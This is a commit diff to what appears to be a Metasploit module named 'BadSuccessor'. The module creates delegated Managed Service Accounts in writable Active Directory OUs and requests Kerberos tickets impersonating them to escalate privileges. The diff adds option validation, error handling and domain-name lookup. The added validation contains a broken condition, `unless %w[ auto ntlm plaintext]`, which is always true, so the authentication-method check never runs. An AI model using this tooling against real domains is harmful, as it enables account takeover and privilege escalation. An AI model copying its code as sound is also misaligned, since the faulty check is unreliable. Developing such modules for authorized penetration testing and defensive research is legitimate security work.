Merge pull request #8 from smcintyre-r7/pr/collab/20472

jheysel-r7 · web-flow · commit 32d63e451259 · 2026-01-14T11:38:39.000-08:00
Option Edge Case Handling For BadSuccessor
diff --git a/modules/auxiliary/admin/ldap/bad_successor.rb b/modules/auxiliary/admin/ldap/bad_successor.rb
@@ -77,6 +77,24 @@ def windows_version_vulnerable?
     true
   end
 
+  def validate
+    errors = {}
+
+    unless %w[ auto ntlm plaintext]
+      # if AUTO changes in the future to not require a password, we'll need to reevaluate this
+      errors['LDAP::Auth'] = 'Only password-based LDAP authentication methods are supported with this exploit.'
+    end
+
+    case action.name
+    when 'GET_TICKET'
+      if %w[ auto ntlm ].include?(datastore['LDAP::Auth']) && Net::NTLM.is_ntlm_hash?(datastore['LDAPPassword'].encode(::Encoding::UTF_16LE))
+        errors['LDAPPassword'] = 'The GET_TICKET action is incompatible with LDAP passwords that are NTLM hashes.'
+      end
+    end
+
+    raise Msf::OptionValidateError.new(errors) unless errors.empty?
+  end
+
   def check
     ldap_connect do |ldap|
       validate_bind_success!(ldap)
@@ -107,9 +125,13 @@ def check
       Exploit::CheckCode::Appears
     end
   rescue Errno::ECONNRESET
-    return Exploit::CheckCode::Unknown('The connection was reset')
-  rescue Rex::ConnectionError, Net::LDAP::Error => e
-    return Exploit::CheckCode::Unknown(e.message)
+    fail_with(Failure::Disconnected, 'The connection was reset.')
+  rescue Rex::ConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
+    fail_with(Failure::NoAccess, e.message)
+  rescue Net::LDAP::Error => e
+    fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
   end
 
   def get_ous_we_can_write_to
@@ -153,16 +175,17 @@ def query_ldap_server(raw_filter, attributes, base_prefix: nil)
   end
 
   def create_dmsa(account_name, writeable_dn, group_membership)
-    sam_account_name = account_name + '$' unless account_name.ends_with?('$')
+    sam_account_name = account_name
+    sam_account_name += '$' unless sam_account_name.ends_with?('$')
     dn = "CN=#{account_name},#{writeable_dn}"
-    print_status("Attempting to create dmsa account cn: #{account_name}, dn: #{dn}")
+    print_status("Attempting to create dMSA account CN: #{account_name}, DN: #{dn}")
 
     dmsa_attributes = {
       'objectclass' => ['top', 'person', 'organizationalPerson', 'user', 'computer', 'msDS-DelegatedManagedServiceAccount'],
       'cn' => [account_name],
       'useraccountcontrol' => ['4096'],
       'samaccountname' => [sam_account_name],
-      'dnshostname' => ["#{Faker::Name.first_name}.#{datastore['LDAPDomain']}"],
+      'dnshostname' => ["#{Faker::Name.first_name}.#{domain_dns_name}"],
       'msds-supportedencryptiontypes' => ['28'],
       'msds-managedpasswordinterval' => ['30'],
       'msds-groupmsamembership' => [group_membership],
@@ -211,7 +234,8 @@ def set_dmsa_attributes(dn, delegated_state, preceded_by_link)
   end
 
   def query_account(account_name)
-    account_name = datastore['DMSA_ACCOUNT_NAME'] + '$' unless datastore['DMSA_ACCOUNT_NAME'].ends_with?('$')
+    account_name = datastore['DMSA_ACCOUNT_NAME']
+    account_name += '$' unless account_name.ends_with?('$')
     entry = adds_get_object_by_samaccountname(@ldap, account_name)
 
     if entry.nil?
@@ -245,6 +269,18 @@ def get_group_memebership(sid)
     sd
   end
 
+  def domain_dns_name
+    return @domain_dns_name if @domain_dns_name
+
+    if @ldap
+      @domain_dns_name = adds_get_domain_info(@ldap)[:dns_name]
+    else
+      ldap_connect { |ldap| @domain_dns_name = adds_get_domain_info(ldap)[:dns_name] }
+    end
+
+    @domain_dns_name
+  end
+
   def action_create_dmsa
     ldap_connect do |ldap|
       validate_bind_success!(ldap)
@@ -259,7 +295,7 @@ def action_create_dmsa
       end
 
       @ldap = ldap
-      currrent_user_info = adds_get_object_by_samaccountname(ldap, datastore['LDAPUsername'])
+      currrent_user_info = adds_get_current_user(@ldap)
       sid = Rex::Proto::MsDtyp::MsDtypSid.read(currrent_user_info[:objectsid].first)
 
       # Get vulnerable OUs
@@ -319,11 +355,11 @@ def action_get_ticket
     impersonate = datastore['DMSA_ACCOUNT_NAME']
     impersonate += '$' unless impersonate.ends_with?('$')
     get_dmsa_tgs_options = {
-      'DOMAIN' => datastore['LDAPDomain'],
+      'DOMAIN' => domain_dns_name,
       'PASSWORD' => datastore['LDAPPassword'],
       'rhosts' => datastore['RHOST'],
       'username' => datastore['LDAPUsername'],
-      'SPN' => "krbtgt/#{datastore['LDAPDomain']}",
+      'SPN' => "krbtgt/#{domain_dns_name}",
       'action' => 'get_tgs',
       'IMPERSONATE' => impersonate,
       'IMPERSONATE_TYPE' => 'dmsa',
@@ -341,7 +377,7 @@ def action_get_ticket
       # Lastly request the ticket for the desired service:
       get_priv_esc_tgs_options = {
         'username' => impersonate,
-        'SPN' => "#{datastore['SERVICE']}/#{datastore['RHOSTNAME']}.#{datastore['LDAPDomain']}",
+        'SPN' => "#{datastore['SERVICE']}/#{datastore['RHOSTNAME']}.#{domain_dns_name}",
         'action' => 'get_tgs',
         'krb5ccname' => temp_ccache_file.path,
         'PASSWORD' => :unset,
@@ -360,7 +396,7 @@ def action_get_ticket
   def init_authenticator(options = {})
     options.merge!({
       host: rhost,
-      realm: datastore['LDAPDomain'],
+      realm: domain_dns_name,
       username: datastore['LDAPUsername'],
       password: datastore['LDAPPassword'],
       framework: framework,
